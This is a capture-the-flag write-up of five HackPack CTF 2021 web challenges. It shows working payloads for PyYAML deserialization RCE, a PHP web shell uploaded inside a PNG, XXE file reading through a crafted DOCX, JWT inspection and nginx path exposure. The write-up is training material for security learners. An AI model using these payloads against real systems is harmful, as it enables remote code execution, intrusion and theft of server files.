All web challenges from HackPack CTF 2021.

“N"ot “G"am"I"ng a"N"ymore in “X"mas

Can you login as admin?
http://no-gaming-anymore-in-xmas.ctf2021.hackpack.club

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
...
	<span>Admin Login</span>
	<div>
		<input placeholder="Password"></input>
	</div>

	<form action="/" method="post">
		<button type="submit" value="Send Email" >Login</button>
		<input type="hidden" name="debug" value="0">
	</form> 
...

Make post request with debug=1, and we get some interesting feedback.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
Let me check again my nginx conf:
server {
    listen 80;
    server_name localhost;

    root /etc/nginx;
    index index.html;

    location /maybehereimportantstuff {
        try_files $uri $uri/ =404;
    }
}

Execute curl https://no-gaming-anymore-in-xmas.ctf2021.hackpack.club/maybehereimportantstuff and get the flag.

Flag: flag{ng1nx_m1sconf1g_c4n_b3_h4rmful}


All about resetting

Who can guess my password or..
http://all-about-resetting.ctf2021.hackpack.club

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<!DOCTYPE html>
<html lang="en">
<head>
	<title>Login V1</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">

</head>

<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<body>	
	<span class="login100-form-title">
		Member Login
	</span>

	<div>
		<input placeholder="Email">

		</input>
	</div>

	<div>
		<input placeholder="Password">

		</input>
	</div>
	
	<div class="container-login100-form-btn">
		<button class="login100-form-btn">
			Login
		</button>
	</div>
	
	<form action="/reset" method="post">
		<button type="submit" value="Send Email" >Forgot Password?</button>
	</form>
	
</body>
</html>

Press Forgot Password?, type in the email npantel@ncsu.edu, submit. Get a question, What is your favorite type of governance?.

Delete session cookie, refresh, get a new cookie. Throw the new session cookie to jwt.io, get header

1
2
3
4
{
  "favoritegovernance": "kakistocracy",
  "favoriteteam": "olympiacos"
}

Type in kakistocracy as answer and login, get the flag.

Flag: flag{Wh4t_1s_th1s_gov3rn4nc3_!!!}


Yaml-2-Json

Checkout my useful tool to convert YAML to JSON format.
http://yaml-2-json.ctf2021.hackpack.club

Since we know flag.txt is located in /tmp/flag.txt from the hint.

There may be a Deserialize RCE vulnerability with PyYAML.

Make request

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST / HTTP/1.1
Host: yaml-2-json.ctf2021.hackpack.club
Connection: close
Content-Length: 76
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://yaml-2-json.ctf2021.hackpack.club
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://yaml-2-json.ctf2021.hackpack.club/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _890f5=http://192.168.181.16:10993; premium=true

yaml=!!python/object/apply:subprocess.check_output [["cat","/tmp/flag.txt"]]

Flag: flag{Py_PyYaml_Yaml_Py}


Indead v1

Job posting website for security experts, pentesters and hackers.
http://indead-upload-avatar.ctf2021.hackpack.club

Get a png file called test.png.

Run

1
2
cp test.png exp.php
echo "<?php system(\$_GET['c']); ?>" >> exp.php

Upload exp.php. The file will be put under very_long_directory_path.

Since we know flag.txt is located in /var/www/ from the hint.

Access https://indead-upload-avatar.ctf2021.hackpack.club/very_long_directory_path/exp.php?c=cat%20/var/www/flag.txt gives us the flag.

Flag: flag{y3t_an0ther_file_uplo@d_vuln}


Indead v2

Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV.
http://indead-upload-cv.ctf2021.hackpack.club

For this challenge, we can only upload DOCX file.

Create test.docx with test1 as content. Upload it, and get output You CV content: test1.

So there might be a XXE vulnerability.

Unzip test.docx, edit word/document.xml.

Add on line 2

1
<!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///var/www/flag.txt'>]>

Edit line 3

1
2
3
4
Original
...<w:t>test1</w:t>...
to
...<w:t>&xxe;</w:t>...

Put all the extracted files to a folder tmp. Create the DOCX file with

1
2
7z a malicious.zip ./tmp/*
mv malicious.zip malicious.docx

Upload malicious.docx, and get the flag.

Flag: flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}